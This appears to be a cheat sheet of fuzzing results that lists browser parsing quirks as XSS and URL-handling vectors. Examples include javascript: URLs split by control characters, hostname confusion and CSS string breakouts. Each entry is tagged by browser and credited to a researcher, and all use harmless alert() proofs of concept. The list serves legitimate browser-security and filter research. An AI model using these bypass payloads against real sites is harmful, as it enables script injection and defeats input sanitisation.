Cheat Sheet
Generated payloads from fuzz test results. Filter by type, category, or browser.
Found 169 vectors with results
anchor.href='/0x09/example.com';0x0D
if(anchor.host === 'example.com')alert(9)Author: hackvertor
JSURL HandlingChrome
anchor.href='///example.com';0x0D
if(anchor.host === 'example.com')alert(47)Author: hackvertor
JSURL HandlingChrome
anchor.href='/\/example.com';0x0D
if(anchor.host === 'example.com')alert(92)Author: hackvertor
JSURL HandlingChrome
anchor.href='/0x00/example.com';0x0D
if(anchor.host === 'example.com')alert(0)Author: hackvertor
JSURL HandlingChrome
document⟦09⟧['location'];alert(9)JSXSS ExecutionChromeFirefoxSafari
document
['location'];alert(10)JSXSS ExecutionChromeFirefoxSafari
document0x0B['location'];alert(11)JSXSS ExecutionChromeFirefoxSafari
document0x0C['location'];alert(12)JSXSS ExecutionChromeFirefoxSafari
document0x0D['location'];alert(13)JSXSS ExecutionChromeFirefoxSafari
<a href="https://0x09example.com/" id="test9"></a>Source: Valid characters before domain 1
Author: avlidienbrunn
XSSURL HandlingChromeFirefoxSafari
<a href="https://
example.com/" id="test10"></a>Source: Valid characters before domain 1
Author: avlidienbrunn
XSSURL HandlingChromeFirefoxSafari
<a href="https://0x0Dexample.com/" id="test13"></a>Source: Valid characters before domain 1
Author: avlidienbrunn
XSSURL HandlingChromeFirefoxSafari
<a href="https:///example.com/" id="test47"></a>Source: Valid characters before domain 1
Author: avlidienbrunn
XSSURL HandlingChromeFirefoxSafari
<a href="https://@example.com/" id="test64"></a>Source: Valid characters before domain 1
Author: avlidienbrunn
XSSURL HandlingChromeFirefoxSafari
if (new URL(String.fromCodePoint(0) + "javascript:alert()").protocol=="javascript:"){alert(0)}Author: ThomasOrlita
JSURL HandlingChromeSafariFirefox
if (new URL(String.fromCodePoint(1) + "javascript:alert()").protocol=="javascript:"){alert(1)}Author: ThomasOrlita
JSURL HandlingChromeSafariFirefox
if (new URL(String.fromCodePoint(2) + "javascript:alert()").protocol=="javascript:"){alert(2)}Author: ThomasOrlita
JSURL HandlingChromeSafariFirefox
if (new URL(String.fromCodePoint(3) + "javascript:alert()").protocol=="javascript:"){alert(3)}Author: ThomasOrlita
JSURL HandlingChromeSafariFirefox
if (new URL(String.fromCodePoint(4) + "javascript:alert()").protocol=="javascript:"){alert(4)}Author: ThomasOrlita
JSURL HandlingChromeSafariFirefox
const c = String.fromCodePoint(i)0x0D
const c_upper = c.toUpperCase()0x0D
if (c_upper.length > c.length && isASCII(c_upper)){0x0D
alert(c)0x0D
}Author: DreyAnd
JSJavaScript SyntaxChrome
<div style="font-family:'blah';color:red"></div>Author: hackvertor
HTMLCSS ParsingChromeFirefoxSafari
window⟦09⟧.alert();alert(9)JSXSS ExecutionChromeFirefoxSafari
window
.alert();alert(10)JSXSS ExecutionChromeFirefoxSafari
window0x0B.alert();alert(11)JSXSS ExecutionChromeFirefoxSafari
window0x0C.alert();alert(12)JSXSS ExecutionChromeFirefoxSafari
window0x0D.alert();alert(13)JSXSS ExecutionChromeFirefoxSafari
const c = String.fromCodePoint(i);0x0D
0x0D
if (c.length !== c.toUpperCase().length) alert(i)Author: ThomasOrlita
JSJavaScript SyntaxChromeFirefoxSafari
if (new URL("https://example.co" + String.fromCodePoint(9) + "m").hostname === 'example.com'){alert(9)}JSURL HandlingChromeFirefoxSafari
if (new URL("https://example.co" + String.fromCodePoint(10) + "m").hostname === 'example.com'){alert(10)}JSURL HandlingChromeFirefoxSafari
if (new URL("https://example.co" + String.fromCodePoint(13) + "m").hostname === 'example.com'){alert(13)}JSURL HandlingChromeFirefoxSafari
if (new URL("https://example.co" + String.fromCodePoint(173) + "m").hostname === 'example.com'){alert(173)}JSURL HandlingChromeFirefoxSafari
if (new URL("https://example.co" + String.fromCodePoint(847) + "m").hostname === 'example.com'){alert(847)}JSURL HandlingChromeFirefoxSafari
<div style="font-family:'x
;color:red;';">test</div>Source: Break out of CSS strings
Author: hackvertor
HTMLCSS ParsingChromeFirefoxSafari
<div style="font-family:'x0x0C;color:red;';">test</div>Source: Break out of CSS strings
Author: hackvertor
HTMLCSS ParsingChromeFirefoxSafari
<div style="font-family:'x0x0D;color:red;';">test</div>Source: Break out of CSS strings
Author: hackvertor
HTMLCSS ParsingChromeFirefoxSafari
<div style="font-family:'x';color:red;';">test</div>Source: Break out of CSS strings
Author: hackvertor
HTMLCSS ParsingChromeFirefoxSafari
const c = String.fromCodePoint(i)0x0D
const c_lower = c.toLowerCase()0x0D
if (c_lower.length != c.length){0x0D
alert(i)0x0D
}Author: JorianWoltjer
JSJavaScript SyntaxChrome
<a id="0" href="j0x09avas0x09crip0x09t:window">craft-me</a>XSSURL HandlingChromeFirefoxSafari
<a id="0" href="j
avas
crip
t:window">craft-me</a>XSSURL HandlingChromeFirefoxSafari
<a id="0" href="j0x0Davas0x0Dcrip0x0Dt:window">craft-me</a>XSSURL HandlingChromeFirefoxSafari